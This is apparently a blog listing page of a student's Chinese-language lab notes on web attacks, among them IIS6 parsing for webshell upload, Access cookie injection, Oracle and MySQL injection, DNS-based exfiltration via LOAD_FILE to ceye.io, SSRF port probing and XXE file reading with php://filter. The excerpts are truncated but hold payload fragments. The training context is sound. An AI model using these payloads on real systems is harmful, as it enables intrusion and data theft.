Track 正式学员

j0h

0关注
0粉丝
39文章
返回网站首页

您已发布 39篇文章作品写文章

8.1、IIS6.0解析漏洞(一)(二)(三)

这里三关都用了同一个asp的文件拿到webshell的,但是应该是没种后台校验的有一点点的区别首先来看第一关的,查看源代码:这里对文件类型、大小还有后缀做了限制,但是我们这关是iis6文件解析漏洞搜索漏洞的利用方式有两种:1.目录解析-----这种需要在服务器后台文件上传的目录文件名为.asp结尾的,我们没办法在后台去创建文件,所以就只能是利用下面第二中文件名下手/xx.asp/xx.jpg2.文

 2018-11-22
 0 
 46 

5.1.1、Access注入 — Cookie注入 ---笔记

今天的靶场环境貌似有问题:利用javascript:alert(document.cookie="id="+escape("171 order by 11"))来看看他是否报错,要注意的是在构造完这个语句之后,必须重新刷新下页面,不带?id=171.这是一个弹窗,证明已经执行了语句。接着点确定。再刷新下页面,如下图:数据库出错,证明没有11个字段,用10试下

 2018-11-22
 0 
 28 

5.4.1、Oracle注入- 报错注入 ---笔记

Oracle注入--报错注入Oracle注入首先是Oracle数据库的注入Dual Oracle中的系统表rownum=1  与limit相似and table name<> 'ADMIN' 理解为排除某个表<>这个表示非的意思首先靶场环境测试单引号和注释发现是字符型参数id然后已经知道是报错注入,使用ctxsys.drithsx.sn注入数据库:

 2018-11-22
 0 
 14 

5.2.2、MYSQL 注入 - Dns注入---笔记

DNS注入(对于这个原理还是不太清楚 ,这个代码里面又是怎么实现的呢)前提条件1.ip被网站限制2.发现疑似漏洞,目标站点不明显3.目标信息显示不出来满足以上其中一条都可以进行DNS注入网址http://ceye.io必须要配置的地方LOAD_FILE(用来读取文件内容,(猜测)也可以是查询内容)主要是利用SELECT LOAD_FILE(CONCAT('\\\\',(s

 2018-11-22
 0 
 20 

5.2.1、MYSQL 注入 - 全方位利用---笔记

1、首先点击进入到传送门,URL是这样的:http://120.203.13.75:6815/,截图是下面这样的。2、然后分别点击首页和查看新闻发现了这个连接:http://120.203.13.75:6815/?id=13、试试在id=1后面加个单引号,页面不显示,后面再加--+注释也不显示:http://120.203.13.75:6815/?id=1%E2%80%98%20--+(双引号也一

 2018-11-21
 0 
 14 

漏洞挖掘-本地包含与远程包含漏洞---笔记

0x00 phpmyadmin简述phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地

 2018-10-31
 1 
 65 

CSRF跨站伪造请求---笔记

1、通过视频讲解,跟着老师的思路,审计sys_verifies.php文件代码,发现会在当前目录下生成inc文件,但是老师视频立面说的文件内容可控制的refiles数组在这个文件下面没有找到(这里我的理解是要从前台获取参数的话应该类似这种:$user_name = $_GET['username'];)。2、索性上面一步先跳过,然后既然上面的文件内容可以控制,那我们可以写入恶意代码

 2018-10-30
 0 
 27 

Accsess注入 — 偏移注入(笔记)

靶场第五章:数据库注入5.1.1、Access注入 — Cookie注入flag需要登录到管理员后台才能拿到,那标题的cookie注入,就需要用到这段代码:javascript:alert(document.cookie="id="+escape("171 类似显错注入的sql语句"));1、打开链接这个链接:http://120.203.13.75:800

 2018-10-18
 0 
 42 

SSRF漏洞和利用 --笔记

首先访问对xml的处理页面,发送POST请求进行内网端口探测。       http://120.203.13.75:8123/ssrf/typecho-1.0-14.10.9-release/index.php/action/xmlrpcPOC<?xml version="1.0" encoding="utf-8&quo

 2018-9-25
 0 
 32 

微信0day实例 — — XXE 实体注入笔记

靶场试验没有成功,拿自己本地的phpstudy试了一把成功了 。首先,请求方式更改成POST,然后payload<?xml version="1.0"?>// xml使用的协议版本号<!DOCTYPE ANY[// 定义了一个ANY的实体 相当于一个函数 代码块<!ENTITY % file SYSTEM "php://filter/read=

 2018-9-22
 0 
 47